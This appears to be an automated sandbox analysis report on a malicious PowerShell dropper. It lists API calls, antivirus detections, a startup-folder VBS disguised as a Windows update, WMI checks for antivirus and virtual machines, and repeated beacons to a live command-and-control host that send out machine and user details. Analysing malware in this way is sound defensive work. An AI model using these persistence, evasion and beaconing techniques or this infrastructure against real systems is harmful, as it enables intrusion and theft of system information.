Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Aug. 26, 2021, 8:46 a.m.	Aug. 26, 2021, 8:49 a.m.

Size	4.8KB
Type	awk or perl script, ASCII text, with very long lines, with CRLF line terminators
MD5	`5480fceef4e5290938cb0a23955358df`
SHA256	`d9cfdea62d4a3acc5ec47cfc0349002af129add61611a0810b73394bc7ea3020`
CRC32	`DE4B135A`
ssdeep	`96:DTDsM8M25rkuqCNshBU+iA99IBNXQMnVJQ8t6W1MG1MGtMTtxFsrkOO60WPEG0uJ:H32VkDhBU+iAbIBNJnVJQ8tzeGeG2TPA`
Yara	Antivirus - Contains references to security software

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\7501.ps1
1608

Name	Response	Post-Analysis Lookup
serv01.nerdpol.ovh	A 185.81.157.187	185.81.157.187

IP Address	Status	Action
164.124.101.2	Active	Moloch
185.81.157.187	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 26, 2021, 8:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2021, 8:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2021, 8:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2021, 8:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2021, 8:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2021, 8:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2021, 8:46 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 26, 2021, 8:46 a.m.	computer_name: TEST22-PC	1	1

Allocates read-write-execute memory (usually to unpack itself) (48 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0268f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ec9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05456000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05457000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05458000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05459000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0545a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0545b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0545c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0545d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0545e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0545f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05640000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05641000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05642000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05643000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05644000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05645000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05646000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05647000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05648000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05649000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0564a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0564b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0564c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0564d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0564e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06510000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06511000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b44000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b48000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06512000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b59000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06560000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x055e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06513000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 26, 2021, 8:46 a.m.	process_identifier: 1608 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02962000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows10DecemberUpdate.vbs

File has been identified by 3 AntiVirus engines on VirusTotal as malicious (3 events)

ESET-NOD32	PowerShell/Agent.WH
Avast	SNH:Script [Dropper]
AVG	SNH:Script [Dropper]

URL downloaded by powershell script (17 events)

Data received	!
Data received	HTTP/1.1 200 OK Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Thu, 26 Aug 2021 00:05:13 GMT 0
Data received	HTTP/1.1 200 OK Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Thu, 26 Aug 2021 00:05:20 GMT 0
Data received	HTTP/1.1 200 OK Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Thu, 26 Aug 2021 00:05:28 GMT 0
Data received	HTTP/1.1 200 OK Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Thu, 26 Aug 2021 00:05:34 GMT 0
Data received	HTTP/1.1 200 OK Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Thu, 26 Aug 2021 00:05:42 GMT 0
Data received	HTTP/1.1 200 OK Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Thu, 26 Aug 2021 00:05:49 GMT 0
Data received	HTTP/1.1 200 OK Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Thu, 26 Aug 2021 00:05:56 GMT 0
Data received	HTTP/1.1 200 OK Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Thu, 26 Aug 2021 00:06:03 GMT 0
Data received	HTTP/1.1 200 OK Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Thu, 26 Aug 2021 00:06:10 GMT 0
Data received	HTTP/1.1 200 OK Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Thu, 26 Aug 2021 00:06:17 GMT 0
Data received	HTTP/1.1 200 OK Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Thu, 26 Aug 2021 00:06:24 GMT 0
Data received	HTTP/1.1 200 OK Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Thu, 26 Aug 2021 00:06:31 GMT 0
Data received	HTTP/1.1 200 OK Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Thu, 26 Aug 2021 00:06:38 GMT 0
Data received	HTTP/1.1 200 OK Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Thu, 26 Aug 2021 00:06:45 GMT 0
Data received	HTTP/1.1 200 OK Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Thu, 26 Aug 2021 00:06:51 GMT 0
Data received	HTTP/1.1 200 OK Transfer-Encoding: chunked Server: Microsoft-HTTPAPI/2.0 Date: Thu, 26 Aug 2021 00:06:59 GMT 0

Poweshell is sending data to a remote host (2 events)

Data sent	!
Data sent	POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: C7BF86780D5F\TEST22-PC\test22\Microsoft Windows 7 Professional N 64-bit\\Yes\Yes\FALSE\ Accept-Encoding: gzip, deflate Host: serv01.nerdpol.ovh:7501 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	select * from Win32_ComputerSystemProduct

Installs itself for autorun at Windows startup (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows10DecemberUpdate.vbs

Executes one or more WMI queries (4 events)

wmi	SELECT * FROM AntiVirusProduct
wmi	select * from Win32_ComputerSystemProduct
wmi	select * from win32_operatingsystem
wmi	select * from Win32_OperatingSystem

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (50 out of 69 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW Aug. 26, 2021, 8:46 a.m.	url: http://serv01.nerdpol.ovh:7501/Vre flags: 0	1	1
HttpOpenRequestW Aug. 26, 2021, 8:46 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Aug. 26, 2021, 8:46 a.m.	buffer: ! socket: 1608 sent: 1	1	1
send Aug. 26, 2021, 8:46 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: C7BF86780D5F\TEST22-PC\test22\Microsoft Windows 7 Professional N 64-bit\\Yes\Yes\FALSE\ Accept-Encoding: gzip, deflate Host: serv01.nerdpol.ovh:7501 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1684 sent: 289	1	289
send Aug. 26, 2021, 8:46 a.m.	buffer: ! socket: 1608 sent: 1	1	1
InternetCrackUrlW Aug. 26, 2021, 8:46 a.m.	url: http://serv01.nerdpol.ovh:7501/Vre flags: 0	1	1
HttpOpenRequestW Aug. 26, 2021, 8:46 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Aug. 26, 2021, 8:46 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: C7BF86780D5F\TEST22-PC\test22\Microsoft Windows 7 Professional N 64-bit\\Yes\Yes\FALSE\ Accept-Encoding: gzip, deflate Host: serv01.nerdpol.ovh:7501 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1684 sent: 289	1	289
send Aug. 26, 2021, 8:46 a.m.	buffer: ! socket: 1608 sent: 1	1	1
InternetCrackUrlW Aug. 26, 2021, 8:46 a.m.	url: http://serv01.nerdpol.ovh:7501/Vre flags: 0	1	1
HttpOpenRequestW Aug. 26, 2021, 8:46 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Aug. 26, 2021, 8:46 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: C7BF86780D5F\TEST22-PC\test22\Microsoft Windows 7 Professional N 64-bit\\Yes\Yes\FALSE\ Accept-Encoding: gzip, deflate Host: serv01.nerdpol.ovh:7501 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1684 sent: 289	1	289
send Aug. 26, 2021, 8:46 a.m.	buffer: ! socket: 1608 sent: 1	1	1
InternetCrackUrlW Aug. 26, 2021, 8:46 a.m.	url: http://serv01.nerdpol.ovh:7501/Vre flags: 0	1	1
HttpOpenRequestW Aug. 26, 2021, 8:46 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Aug. 26, 2021, 8:46 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: C7BF86780D5F\TEST22-PC\test22\Microsoft Windows 7 Professional N 64-bit\\Yes\Yes\FALSE\ Accept-Encoding: gzip, deflate Host: serv01.nerdpol.ovh:7501 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1684 sent: 289	1	289
send Aug. 26, 2021, 8:46 a.m.	buffer: ! socket: 1608 sent: 1	1	1
InternetCrackUrlW Aug. 26, 2021, 8:46 a.m.	url: http://serv01.nerdpol.ovh:7501/Vre flags: 0	1	1
HttpOpenRequestW Aug. 26, 2021, 8:46 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Aug. 26, 2021, 8:46 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: C7BF86780D5F\TEST22-PC\test22\Microsoft Windows 7 Professional N 64-bit\\Yes\Yes\FALSE\ Accept-Encoding: gzip, deflate Host: serv01.nerdpol.ovh:7501 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1684 sent: 289	1	289
send Aug. 26, 2021, 8:46 a.m.	buffer: ! socket: 1608 sent: 1	1	1
InternetCrackUrlW Aug. 26, 2021, 8:46 a.m.	url: http://serv01.nerdpol.ovh:7501/Vre flags: 0	1	1
HttpOpenRequestW Aug. 26, 2021, 8:46 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Aug. 26, 2021, 8:46 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: C7BF86780D5F\TEST22-PC\test22\Microsoft Windows 7 Professional N 64-bit\\Yes\Yes\FALSE\ Accept-Encoding: gzip, deflate Host: serv01.nerdpol.ovh:7501 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1684 sent: 289	1	289
send Aug. 26, 2021, 8:46 a.m.	buffer: ! socket: 1608 sent: 1	1	1
InternetCrackUrlW Aug. 26, 2021, 8:46 a.m.	url: http://serv01.nerdpol.ovh:7501/Vre flags: 0	1	1
HttpOpenRequestW Aug. 26, 2021, 8:46 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Aug. 26, 2021, 8:46 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: C7BF86780D5F\TEST22-PC\test22\Microsoft Windows 7 Professional N 64-bit\\Yes\Yes\FALSE\ Accept-Encoding: gzip, deflate Host: serv01.nerdpol.ovh:7501 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1684 sent: 289	1	289
send Aug. 26, 2021, 8:46 a.m.	buffer: ! socket: 1608 sent: 1	1	1
InternetCrackUrlW Aug. 26, 2021, 8:46 a.m.	url: http://serv01.nerdpol.ovh:7501/Vre flags: 0	1	1
HttpOpenRequestW Aug. 26, 2021, 8:46 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Aug. 26, 2021, 8:46 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: C7BF86780D5F\TEST22-PC\test22\Microsoft Windows 7 Professional N 64-bit\\Yes\Yes\FALSE\ Accept-Encoding: gzip, deflate Host: serv01.nerdpol.ovh:7501 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1684 sent: 289	1	289
send Aug. 26, 2021, 8:46 a.m.	buffer: ! socket: 1608 sent: 1	1	1
InternetCrackUrlW Aug. 26, 2021, 8:47 a.m.	url: http://serv01.nerdpol.ovh:7501/Vre flags: 0	1	1
HttpOpenRequestW Aug. 26, 2021, 8:47 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Aug. 26, 2021, 8:47 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: C7BF86780D5F\TEST22-PC\test22\Microsoft Windows 7 Professional N 64-bit\\Yes\Yes\FALSE\ Accept-Encoding: gzip, deflate Host: serv01.nerdpol.ovh:7501 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1684 sent: 289	1	289
send Aug. 26, 2021, 8:47 a.m.	buffer: ! socket: 1608 sent: 1	1	1
InternetCrackUrlW Aug. 26, 2021, 8:47 a.m.	url: http://serv01.nerdpol.ovh:7501/Vre flags: 0	1	1
HttpOpenRequestW Aug. 26, 2021, 8:47 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
send Aug. 26, 2021, 8:47 a.m.	buffer: POST /Vre HTTP/1.1 Accept: / Accept-Language: ko User-Agent: C7BF86780D5F\TEST22-PC\test22\Microsoft Windows 7 Professional N 64-bit\\Yes\Yes\FALSE\ Accept-Encoding: gzip, deflate Host: serv01.nerdpol.ovh:7501 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache socket: 1684 sent: 289	1	289
send Aug. 26, 2021, 8:47 a.m.	buffer: ! socket: 1608 sent: 1	1	1
InternetCrackUrlW Aug. 26, 2021, 8:47 a.m.	url: http://serv01.nerdpol.ovh:7501/Vre flags: 0	1	1
HttpOpenRequestW Aug. 26, 2021, 8:47 a.m.	connect_handle: 0x00cc0008 http_version: flags: 71303168 http_method: POST referer: path: /Vre	1	13369356
